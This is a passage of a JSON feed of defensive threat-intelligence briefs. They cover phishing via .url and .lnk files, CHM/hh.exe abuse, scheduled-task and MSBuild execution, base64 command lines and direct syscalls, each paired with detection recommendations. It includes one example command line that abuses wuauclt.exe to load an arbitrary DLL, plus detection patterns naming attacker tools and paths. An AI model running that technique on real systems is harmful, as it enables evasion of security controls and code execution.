executable.\u003c/li\u003e\n\u003cli\u003eThe operating system attempts to open the URL using the default web browser or execute the embedded command.\u003c/li\u003e\n\u003cli\u003eIf the URL points to a malicious website, the victim may be prompted to download and execute malware.\u003c/li\u003e\n\u003cli\u003eThe malware executes, potentially leading to system compromise, data theft, or other malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the execution of arbitrary commands, redirection to malicious websites, and subsequent malware infection. If successful, attackers can compromise user systems, steal sensitive information, or establish a foothold for further malicious activities within the organization\u0026rsquo;s network. The impact can range from individual system compromise to broader network breaches, depending on the attacker\u0026rsquo;s objectives and the extent of the infection.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDownloaded URL Files Created\u003c/code\u003e to your SIEM to detect the creation of downloaded .url files with a non-local Zone Identifier and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any \u003ccode\u003efile creation\u003c/code\u003e events where \u003ccode\u003efile.extension == \u0026quot;url\u0026quot;\u003c/code\u003e and \u003ccode\u003efile.Ext.windows.zone_identifier == 3\u003c/code\u003e using the provided investigation steps in the advisory.\u003c/li\u003e\n\u003cli\u003eUpdate security policies and endpoint protection configurations to block the download and execution of .url files from untrusted sources, as mentioned in the advisory.\u003c/li\u003e\n\u003cli\u003eEducate users on safe downloading practices and the risks associated with opening .url files from untrusted sources, as highlighted in the advisory\u0026rsquo;s false positive analysis.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T17:49:12Z","date_published":"2024-01-04T17:49:12Z","id":"/briefs/2024-01-downloaded-url-files/","summary":"This detection rule identifies downloaded .url shortcut files on Windows systems, often used in phishing campaigns, by monitoring their creation events and flagging those from non-local sources, enabling early threat detection.","title":"Detection of Downloaded URL Files Used in Phishing Campaigns","url":"https://feed.craftedsignal.io/briefs/2024-01-downloaded-url-files/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows Auto Update Client"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","lolbas","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers are abusing the Windows Update Auto Update Client (wuauclt.exe) to execute arbitrary code by loading malicious DLLs. This technique allows malicious actors to evade defenses by masquerading their activity as legitimate Windows processes. The abuse involves using specific command-line arguments with wuauclt.exe to load a DLL from a user-writable directory. This behavior has been observed in various attacks aimed at evading traditional security measures. This is an effective defense evasion and execution technique, allowing attackers to execute code while blending in with normal system processes, potentially bypassing application control and other security mechanisms.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system through an unrelated method.\u003c/li\u003e\n\u003cli\u003eThe attacker places a malicious DLL in a directory writable by standard users, such as \u003ccode\u003eC:\\Users\\\u0026lt;username\u0026gt;\\\u003c/code\u003e, \u003ccode\u003eC:\\ProgramData\\\u003c/code\u003e, \u003ccode\u003eC:\\Windows\\Temp\\\u003c/code\u003e, or \u003ccode\u003eC:\\Windows\\Tasks\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003ewuauclt.exe\u003c/code\u003e with the arguments \u003ccode\u003e/RunHandlerComServer\u003c/code\u003e and \u003ccode\u003e/UpdateDeploymentProvider\u003c/code\u003e along with the path to the malicious DLL. For example: \u003ccode\u003ewuauclt.exe /RunHandlerComServer /UpdateDeploymentProvider /dll:\u0026lt;path_to_malicious_dll\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ewuauclt.exe\u003c/code\u003e loads the specified malicious DLL.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL executes arbitrary code within the context of the \u003ccode\u003ewuauclt.exe\u003c/code\u003e process.\u003c/li\u003e\n\u003cli\u003eThe malicious code performs its intended actions, such as establishing persistence, communicating with a C2 server, or escalating privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker may then use the compromised system as a foothold for lateral movement within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code within a trusted Windows process, potentially bypassing security controls and making detection more difficult. While specific victim counts are unavailable, this technique can be used in targeted attacks against organizations where defense evasion is a priority for the adversary. Successful execution can lead to complete system compromise, data theft, or further malicious activities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eImageLoad via Windows Update Auto Update Client\u003c/code\u003e to detect the execution of \u003ccode\u003ewuauclt.exe\u003c/code\u003e with suspicious arguments.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for \u003ccode\u003ewuauclt.exe\u003c/code\u003e with the arguments \u003ccode\u003e/RunHandlerComServer\u003c/code\u003e and \u003ccode\u003e/UpdateDeploymentProvider\u003c/code\u003e, focusing on DLL paths in user-writable directories.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation and image-load logging to improve visibility into this type of attack.\u003c/li\u003e\n\u003cli\u003eAudit DLLs loaded by \u003ccode\u003ewuauclt.exe\u003c/code\u003e and investigate any unsigned or unexpected DLLs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-04T12:00:00Z","date_published":"2024-01-04T12:00:00Z","id":"/briefs/2024-01-wuauclt-dll-load/","summary":"The Windows Update Auto Update Client (wuauclt.exe) is being abused to load arbitrary DLLs, a defense evasion technique where malicious activity blends with legitimate Windows software by using specific process arguments and placing DLLs in writable paths.","title":"Abuse of Windows Update Client for DLL Loading","url":"https://feed.craftedsignal.io/briefs/2024-01-wuauclt-dll-load/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft HTML Help system","Elastic Defend","Microsoft Defender XDR","Sysmon","SentinelOne Cloud Funnel","CrowdStrike"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","compiled-html","windows","proxy-execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eAttackers are known to deliver malicious payloads within compiled HTML files (.chm) to bypass security measures and gain initial access to systems. This technique leverages the Microsoft HTML Help system and its associated executable, hh.exe, to proxy the execution of malicious code. Compiled HTML files can contain various types of content, including HTML documents, images, and scripting languages like VBA, JScript, Java, and ActiveX. By embedding malicious scripts or executables within a .chm file, attackers can trick users into executing them when they open the file. This is particularly effective because hh.exe is a signed binary, which may allow it to bypass certain security controls. The scope of this technique affects Windows systems where the HTML Help system is installed.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious .chm file containing embedded malicious code, such as a PowerShell script or executable.\u003c/li\u003e\n\u003cli\u003eThe attacker delivers the .chm file to the victim via social engineering, such as phishing or malicious websites.\u003c/li\u003e\n\u003cli\u003eThe victim opens the .chm file, causing hh.exe to launch.\u003c/li\u003e\n\u003cli\u003ehh.exe processes the .chm file, rendering its content, which includes the embedded malicious script or executable.\u003c/li\u003e\n\u003cli\u003eThe malicious code executes, often spawning a scripting interpreter like \u003ccode\u003epowershell.exe\u003c/code\u003e or \u003ccode\u003ecmd.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe scripting interpreter executes commands to download additional payloads or perform malicious actions on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker gains initial access to the victim\u0026rsquo;s system.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges and moves laterally within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to initial access, code execution, and potentially full system compromise. This can result in data theft, malware installation, and further lateral movement within the network. The severity and impact depend on the permissions of the user running hh.exe and the nature of the malicious payload.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Compiled HTML File Spawning Suspicious Processes\u0026rdquo; to your SIEM to detect instances where \u003ccode\u003ehh.exe\u003c/code\u003e is the parent process of scripting interpreters.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to provide the necessary data for the Sigma rule to function correctly.\u003c/li\u003e\n\u003cli\u003eMonitor process execution chains for unknown processes originating from \u003ccode\u003ehh.exe\u003c/code\u003e, as mentioned in the investigation guide.\u003c/li\u003e\n\u003cli\u003eImplement email filtering and security awareness training to prevent users from opening malicious .chm files delivered via phishing.\u003c/li\u003e\n\u003cli\u003eBlock the execution of unsigned or untrusted executables in the environment to reduce the risk of malicious code execution.\u003c/li\u003e\n\u003cli\u003eUse endpoint detection and response (EDR) solutions like Elastic Defend, CrowdStrike, Microsoft Defender XDR, and SentinelOne to detect and respond to malicious activity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T18:30:00Z","date_published":"2024-01-03T18:30:00Z","id":"/briefs/2024-01-compiled-html-execution/","summary":"Adversaries may conceal malicious code in compiled HTML files (.chm) and deliver them to a victim for execution, using the HTML Help executable (hh.exe) to proxy the execution of scripting interpreters and bypass security controls.","title":"Process Activity via Compiled HTML File Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-compiled-html-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["phishing","lnk","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection identifies suspicious .lnk files created on Windows systems, especially those downloaded from external sources, which may indicate potential phishing attempts. The rule leverages file creation events and zone identifiers to trace the file\u0026rsquo;s origin. Adversaries exploit shortcut files by embedding malicious commands within them, often distributing these files via phishing campaigns. This can lead to arbitrary code execution upon user interaction. The rule is designed for data generated by Elastic Defend.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser receives a phishing email containing a malicious .lnk file.\u003c/li\u003e\n\u003cli\u003eThe user downloads the .lnk file to their Windows system.\u003c/li\u003e\n\u003cli\u003eThe Windows OS marks the file with a Zone Identifier indicating it came from an external source.\u003c/li\u003e\n\u003cli\u003eThe user double-clicks the .lnk file, triggering its execution.\u003c/li\u003e\n\u003cli\u003eThe .lnk file executes embedded commands, such as PowerShell or cmd.exe.\u003c/li\u003e\n\u003cli\u003eThe command downloads and executes a malicious payload from a remote server.\u003c/li\u003e\n\u003cli\u003eThe payload establishes persistence on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access and control over the infected host.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the compromise of the user\u0026rsquo;s system, potentially resulting in data theft, malware installation, or further propagation of the attack within the network.  The severity of the impact depends on the privileges of the compromised user account and the attacker\u0026rsquo;s objectives. The rule aims to detect and prevent such attacks early in the attack chain, reducing the potential damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Downloaded Shortcut Files\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Elastic Defend to capture the necessary file creation events for the rule to function.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the rule, paying close attention to the file path, zone identifier, and associated user account.\u003c/li\u003e\n\u003cli\u003eUpdate security policies to restrict the execution of .lnk files from untrusted sources.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of opening suspicious attachments, especially .lnk files, to prevent initial access.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T18:22:32Z","date_published":"2024-01-03T18:22:32Z","id":"/briefs/2024-01-downloaded-lnk/","summary":"This rule detects potentially malicious .lnk shortcut files downloaded from outside the local network on Windows systems, which are commonly used in phishing campaigns.","title":"Detection of Downloaded Shortcut Files","url":"https://feed.craftedsignal.io/briefs/2024-01-downloaded-lnk/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["persistence","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious program executions initiated by scheduled tasks on Windows systems. Adversaries often exploit scheduled tasks for persistence and to execute malicious programs. This rule focuses on detecting known malicious executables, such as PowerShell, Cmd, and MSHTA, when launched from unusual file paths like user directories or temporary folders. It leverages process lineage analysis, specifically looking for processes spawned by \u003ccode\u003esvchost.exe\u003c/code\u003e with the \u0026ldquo;Schedule\u0026rdquo; argument, to determine if the execution originated from a scheduled task. The rule aims to pinpoint potential threats effectively by excluding benign processes and focusing on suspicious combinations of executables and paths. The rule was last updated on 2026-05-04.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker creates or modifies a scheduled task to execute a malicious payload. This task is designed to run at a specific time or event.\u003c/li\u003e\n\u003cli\u003eThe Windows Task Scheduler service (\u003ccode\u003esvchost.exe\u003c/code\u003e with \u0026ldquo;Schedule\u0026rdquo; argument) initiates the scheduled task.\u003c/li\u003e\n\u003cli\u003eThe scheduled task executes a suspicious executable, such as \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, or \u003ccode\u003emshta.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe suspicious executable is launched from an unusual or suspicious path, such as \u003ccode\u003eC:\\\\Users\\\\\u003c/code\u003e, \u003ccode\u003eC:\\\\ProgramData\\\\\u003c/code\u003e, or \u003ccode\u003eC:\\\\Windows\\\\Temp\\\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed payload performs malicious activities, such as downloading additional malware, establishing persistence, or exfiltrating data.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence on the system through the scheduled task, allowing for repeated execution of the malicious payload.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to maintain persistent access to the compromised system, execute malicious code, and potentially escalate privileges. This can lead to data theft, system compromise, and further lateral movement within the network. The damage includes potential data exfiltration, malware installation, and disruption of normal system operations.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to detect suspicious executions (logs-endpoint.events.process-* and logs-windows.sysmon_operational-*).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Execution via Scheduled Task\u0026rdquo; to your SIEM to identify potentially malicious processes executed via scheduled tasks. Tune the rule to exclude legitimate software installations or updates (see rule section below).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on processes with suspicious original file names and command line arguments (process.pe.original_file_name, process.args).\u003c/li\u003e\n\u003cli\u003eMonitor scheduled tasks for unauthorized modifications or additions, as this is a common technique for persistence (registry_set).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T18:00:00Z","date_published":"2024-01-03T18:00:00Z","id":"/briefs/2024-01-suspicious-scheduled-task-runtime/","summary":"This rule identifies execution of suspicious programs via scheduled tasks by looking at process lineage and command line usage, detecting processes such as cscript.exe, powershell.exe, and cmd.exe when executed from suspicious paths like C:\\Users\\ and C:\\ProgramData\\.","title":"Suspicious Execution via Scheduled Task","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-scheduled-task-runtime/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["HTML Help"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","command-and-control","malicious-file","html-help"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAdversaries may conceal malicious code in a compiled HTML file (.chm) and deliver it to a victim for execution. CHM content is loaded by the HTML Help executable program (hh.exe). Attackers can use CHM files to proxy the execution of malicious payloads via a signed binary to bypass security controls, and also to gain initial access to environments via social engineering methods. This rule identifies network connections done by hh.exe, which can potentially indicate abuse to download malicious files or tooling, or masquerading. The detection logic focuses on network connections originating from hh.exe to external IPs, excluding private or reserved IP ranges.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe user receives a compiled HTML file (.chm), often through social engineering tactics such as phishing.\u003c/li\u003e\n\u003cli\u003eThe user opens the .chm file, which is then executed by the HTML Help executable (hh.exe).\u003c/li\u003e\n\u003cli\u003eThe hh.exe process loads and renders the HTML content within the .chm file.\u003c/li\u003e\n\u003cli\u003eEmbedded within the HTML content is malicious JavaScript or other scripting code.\u003c/li\u003e\n\u003cli\u003eThe malicious script executes, initiating a network connection via hh.exe to an external server.\u003c/li\u003e\n\u003cli\u003eThe external server hosts a malicious payload, such as a reverse shell or an executable file.\u003c/li\u003e\n\u003cli\u003eHh.exe downloads the malicious payload to the victim\u0026rsquo;s machine.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is executed, granting the attacker initial access or performing other malicious actions like data exfiltration or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to initial access to a victim\u0026rsquo;s system, potentially bypassing security controls through a signed Microsoft binary. This can result in the download and execution of arbitrary payloads, leading to data exfiltration, lateral movement within the network, or installation of malware. The exploitation can spread rapidly through social engineering, affecting multiple users within an organization. While the severity is rated as medium, the potential for escalation to a critical compromise is high if the attacker gains a foothold in the environment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process and network monitoring on Windows endpoints, focusing on hh.exe activity (Data Source: Elastic Defend, Sysmon, SentinelOne).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eNetwork Connection via Compiled HTML File\u003c/code\u003e to your SIEM and tune for your environment to detect suspicious network connections initiated by hh.exe.\u003c/li\u003e\n\u003cli\u003eMonitor for hh.exe spawning child processes, which could indicate the execution of downloaded payloads. Create a Sigma rule to detect such events.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised host and restrict lateral movement.\u003c/li\u003e\n\u003cli\u003eConduct regular security awareness training to educate users about the risks of opening unsolicited .chm files.\u003c/li\u003e\n\u003cli\u003eInspect the digital signatures of hh.exe and other system binaries to ensure their integrity and authenticity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T17:00:00Z","date_published":"2024-01-03T17:00:00Z","id":"/briefs/2024-01-hh-exe-network-connection/","summary":"This rule detects network connections initiated by hh.exe, the HTML Help executable, which may indicate the execution of malicious code embedded in compiled HTML files (.chm) to deliver malicious payloads, bypass security controls, and gain initial access via social engineering.","title":"Network Connection via Compiled HTML File","url":"https://feed.craftedsignal.io/briefs/2024-01-hh-exe-network-connection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Endpoint"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","scripting-interpreter","base64","command-line"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis rule identifies the execution of scripting interpreters (Python, PowerShell, Node.js, and Deno) with unusually long command lines containing base64 encoded payloads. The rule focuses on scenarios where the initial \u003ccode\u003eprocess.command_line\u003c/code\u003e field is ignored due to its excessive length, but the complete command line is still available in \u003ccode\u003eprocess.command_line.text\u003c/code\u003e. Attackers leverage this technique to evade traditional command-line inspection and execute malicious content across Windows, macOS, and Linux systems. This approach allows attackers to embed and execute code without writing it to disk, making it harder to detect. The rule is designed to detect this behavior, allowing for closer inspection of the executed commands and their intent.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses PowerShell, Python, Node.js, or Deno to execute commands.\u003c/li\u003e\n\u003cli\u003eA long, base64-encoded string is crafted, designed to evade detection.\u003c/li\u003e\n\u003cli\u003eThe interpreter is invoked with the encoded string passed as an argument, exceeding typical command-line limits.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eprocess.command_line\u003c/code\u003e field is truncated due to its length, but the full command line is available in \u003ccode\u003eprocess.command_line.text\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe interpreter decodes and executes the payload from the \u003ccode\u003eprocess.command_line.text\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe decoded payload performs malicious actions such as downloading malware, establishing persistence, or exfiltrating data.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as gaining control of the system or stealing sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to a wide range of malicious activities, including malware installation, data theft, privilege escalation, and system compromise. Due to the defense evasion capabilities, it is difficult to identify and prevent. The impact includes potential data breaches, financial losses, and reputational damage. The rule\u0026rsquo;s detection helps defenders identify this attack vector and prevent further exploitation of affected systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Long Base64 Encoded Command via Scripting Interpreter\u003c/code\u003e to your SIEM to detect this behavior.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule, focusing on the \u003ccode\u003eprocess.command_line.text\u003c/code\u003e field to understand the full command being executed.\u003c/li\u003e\n\u003cli\u003eReview parent processes and execution chains of the interpreter to understand the initial attack vector.\u003c/li\u003e\n\u003cli\u003eImplement controls to restrict the execution of scripting interpreters from untrusted sources.\u003c/li\u003e\n\u003cli\u003eMonitor process execution logs for command lines exceeding a certain length threshold.\u003c/li\u003e\n\u003cli\u003eImprove logging coverage to capture the full command line even when it exceeds standard limits.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T17:00:00Z","date_published":"2024-01-03T17:00:00Z","id":"/briefs/2024-01-03-long-base64-interpreter-cmdline/","summary":"Detection of oversized command lines used by Python, PowerShell, Node.js, or Deno interpreters containing base64 decoding or encoded-command patterns, indicating potential evasion and malicious execution.","title":"Long Base64 Encoded Command via Scripting Interpreter","url":"https://feed.craftedsignal.io/briefs/2024-01-03-long-base64-interpreter-cmdline/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["MSBuild","Elastic Defend","Sysmon","Windows Security Event Logs"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","msbuild"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003eThe Microsoft Build Engine (MSBuild) is a legitimate tool used for building applications. However, adversaries may abuse MSBuild to execute malicious scripts or compile code, effectively bypassing security controls. This technique is often employed to deploy malicious payloads. This detection focuses on identifying instances where MSBuild initiates unusual processes such as PowerShell, Internet Explorer, or the Visual C# Command Line Compiler (csc.exe). This activity is considered suspicious because legitimate software development workflows do not typically involve MSBuild directly spawning these processes. The original Elastic detection rule was created on 2020-03-25 and last updated on 2026-05-04.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker modifies or creates an MSBuild project file (.csproj or .sln) containing malicious commands.\u003c/li\u003e\n\u003cli\u003eThe malicious MSBuild project file is crafted to execute a script or compile code.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the MSBuild.exe or msbuild.exe utility to execute the malicious project file.\u003c/li\u003e\n\u003cli\u003eMSBuild spawns an unusual process such as powershell.exe, csc.exe, or iexplore.exe based on the malicious project file configuration.\u003c/li\u003e\n\u003cli\u003ePowerShell executes arbitrary commands, downloads further payloads, or performs other malicious actions.\u003c/li\u003e\n\u003cli\u003eThe C# compiler (csc.exe) compiles malicious code into an executable or library.\u003c/li\u003e\n\u003cli\u003eThe compiled malware or downloaded payloads execute, leading to further compromise, such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution, allowing attackers to deploy malware, compromise sensitive data, and establish persistence on the targeted system. The use of MSBuild for malicious purposes allows attackers to bypass application whitelisting and other security controls that trust signed Microsoft binaries. While the precise number of victims is unknown, this technique can be employed against a wide range of organizations, particularly those with vulnerable systems or inadequate endpoint protection.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging, specifically including parent-child relationships, to detect unusual process spawning by MSBuild (logs-endpoint.events.process-*, logs-system.security*, logs-windows.forwarded*, logs-windows.sysmon_operational-*, winlogbeat-*).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Microsoft Build Engine Started an Unusual Process\u0026rdquo; to your SIEM to identify instances of MSBuild spawning suspicious processes, and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of MSBuild spawning PowerShell, csc.exe, or iexplore.exe to determine if the activity is legitimate or malicious (process.name:(\u0026ldquo;csc.exe\u0026rdquo; or \u0026ldquo;iexplore.exe\u0026rdquo; or \u0026ldquo;powershell.exe\u0026rdquo;)).\u003c/li\u003e\n\u003cli\u003eMonitor for modifications to MSBuild project files (.proj or .sln) for signs of tampering.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:30:00Z","date_published":"2024-01-03T15:30:00Z","id":"/briefs/2024-01-msbuild-unusual-process/","summary":"Adversaries may exploit MSBuild to execute malicious scripts or compile code, bypassing security controls; this rule detects unusual processes initiated by MSBuild, such as PowerShell or C# compiler, signaling potential misuse for executing unauthorized or harmful actions.","title":"MSBuild запускает необычные процессы","url":"https://feed.craftedsignal.io/briefs/2024-01-msbuild-unusual-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["EdgeWebView","Acrobat DC","AMP","Symantec Endpoint Protection","Malwarebytes Anti-Exploit"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Cisco","Adobe","Symantec","Malwarebytes"],"content_html":"\u003cp\u003eThis detection identifies suspicious process access events on Windows systems where a process attempts to access another process\u0026rsquo;s memory via direct system calls, bypassing standard Windows API calls. Endpoint security solutions often hook userland Windows APIs to detect malicious code execution. Attackers can evade these hooks by directly invoking syscalls, which are lower-level instructions that interact directly with the operating system kernel. The rule specifically looks for process access events (Sysmon Event ID 10) where the call trace does not originate from known Windows system DLLs like ntdll.dll, indicating a potential attempt to bypass security measures. The rule excludes certain legitimate applications, such as Malwarebytes Anti-Exploit, Cisco AMP, Microsoft EdgeWebView, and Adobe Acrobat DC, to reduce false positives. This technique is often employed by advanced malware and red teams to evade detection.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA malicious process is executed on the system, either through user interaction or exploitation of a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe process attempts to gain access to another process\u0026rsquo;s memory space (Target Process).\u003c/li\u003e\n\u003cli\u003eInstead of using standard Windows API calls, the malicious process directly invokes system calls (syscalls) to access the target process\u0026rsquo;s memory.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eCallTrace\u003c/code\u003e in the Sysmon event does not originate from expected system DLLs like \u003ccode\u003entdll.dll\u003c/code\u003e, \u003ccode\u003esysfer.dll\u003c/code\u003e, \u003ccode\u003ewow64cpu.dll\u003c/code\u003e, \u003ccode\u003ewow64win.dll\u003c/code\u003e, or \u003ccode\u003ewin32u.dll\u003c/code\u003e, indicating a direct syscall.\u003c/li\u003e\n\u003cli\u003eThe process might attempt to read sensitive information such as credentials, inject malicious code, or manipulate the target process\u0026rsquo;s behavior.\u003c/li\u003e\n\u003cli\u003eThe malicious process performs actions within the context of the target process, such as executing injected code or accessing sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised process to achieve their objectives, such as data exfiltration, lateral movement, or privilege escalation.\u003c/li\u003e\n\u003cli\u003eThe attacker cleans up any traces of their activity and attempts to maintain persistence on the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the compromise of sensitive data, the injection of malicious code into legitimate processes, and the complete takeover of the affected system. This can result in data breaches, financial loss, and reputational damage. The impact is especially significant if the target process holds sensitive credentials, browser secrets, or has security-product context.\u003c/p\u003e\n\u003ch2 